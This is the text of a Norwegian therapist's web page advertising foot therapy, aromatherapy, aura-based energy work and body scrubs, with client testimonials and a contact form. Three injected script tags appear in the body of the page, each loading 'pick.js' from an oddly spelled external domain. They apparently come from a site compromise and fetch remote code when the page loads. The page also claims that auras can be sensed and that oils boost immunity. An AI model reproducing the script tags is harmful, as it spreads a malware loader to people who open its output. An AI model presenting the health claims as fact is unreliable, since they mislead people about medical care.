BEHANDLINGER

<script src='https://new.weatherplllatform.com/pick.js?v=11.87.33' type='text/javascript'></script>

FOTTERAPI

ER EN HELSEFAGLIG BEHANDLING UTFØRT AV AUTORISERT HELSEPERSONELL

Fotpleie er en kosmetisk behandling for velværens del alene. En fotterapeut utfører også fotpleie. Fotterapi gir også velvære, og fokuserer på å forebygge og behandle lidelser knyttet til fotens hud, negler, skjelett og muskler. Fotterapeuter behandler inngrodde tånegler, tykke negler, torner, skjæring av hard hud, behandler sprekker, avlastninger osv. Alle kan oppsøke en fotterapeut for å få en tilstandssjekk, råd om riktig bruk av fottøy og pleiende behandling. Som autorisert helsepersonell kan fotterapeuter henvise til andre instanser som lege, ortoped, ortopediing. osv.

En rekke utbredte sykdommer påvirker fothelsen. Om du har diabetes, reumatisk sykdom, psoriasis eller hjerte-og karsykdom bør føttene dine undersøkes jevnlig av en fotterapeut.

Wenche Holløkken aromaterapi fotsoneterapi<script src='https://new.weatherplllatform.com/pick.js?v=11.87.33' type='text/javascript'></script>

AROMATERAPI

ER ANVENDELSEN AV AROMATISKE PLANTEOLJER ELLER SÅKALTE ETERISKE OLJER

Hensiktet med aromaterapi er å skape fysisk, mental og emosjonell balanse; og ikke minst velbefinnende. Duftene som avgis av plantene kommer fra potente, flyktige essenser som finnes i små hulrom i plantene. De innehar kraftfulle egenskaper som blir anvendt i aromaterapien for å styrke vitalitet og helse, blant annet ved å forsterke kroppens selvhelbredende krefter.

Aromaterapi er en behagelig massasje på hele kroppen, der de eteriske oljene blir tatt opp i blodstrømmen og gir fullstendig avslapping og velvære. Aromaterapi kan ligne en klassisk massasje, men her blir du smurt inn i aromatiske oljer utvunnet av planter som gir mange resultater, som blant annet et styrket immunforsvar, økt blodsirkulasjon og det kan lindre smerter i kropp og sinn.

<script src='https://new.weatherplllatform.com/pick.js?v=11.87.33' type='text/javascript'></script>

ANDRE TERAPIFORMER

ENERGIARBEID/ENERGI-BALANSERING SOM FÅR KROPPEN I BALANSE OG KROPPSSKRUBB

Mennesker har, i tillegg til sin fysiske kropp, en energikropp, kalt aura, som omgir og gjennomtrenger kroppen. Auraen er som kroppen nært knyttet til vårt tanke og følelsesliv, til vår bevissthet. Auraen er ett nettverk av energibaner hvor vi blant annet tar inn vital livskraft til hver eneste celle i kroppen. Når energien sirkulerer fritt fungerer kroppen optimalt. Låser energien seg eller kommer i ubalanse, kan kroppslige tilstander fremtre. Jeg kan se/ føle slike blokkeringer i energibanene. I tillegg til kroppslig bedring gir behandlingen også at klienten en indre ro, bedre søvn, mer energi, livsvilje og mer kontakt med følelser.

KROPPSSKRUBB er en skrubb av hele kroppen gjør huden silkemyk, klar for solen, og gir en langvarig brunfarge.

KUNDEREFERANSER

HER KOMMER NOEN HYGGELIGE ORD FRA MINE KJÆRE KUNDER

"En hyggelig og flink dame. Anbefales både for kvinner og menn."

— SONJA ELEN NUMMI-HAAVOLD
 

"Kjempebra følelse både under og etter behandling. Dette skal jeg fortsette med!"

— HAEGE KRANSTAD
 

"Anbefales på det sterkeste.  Wenche er veldig flink med føtter og en veldig omsorgsfull terapeut."

— JUNE H GLOSLI OLSEN
 

"Fantastisk dyktig, hyggelig og hjelpsom. Anbefales."

— BEATE LOMARK-ZIARKOWSKI
 

"FOR en fin behandling jeg fikk under min første time hos Wenche. Det er den beste behandlingen jeg har hatt noensinne. Wenche er flink!"

— RIGMOR WALER
 

Kontakt meg

Vennligst skriv inn ditt navn.
Vennligst skriv inn en melding.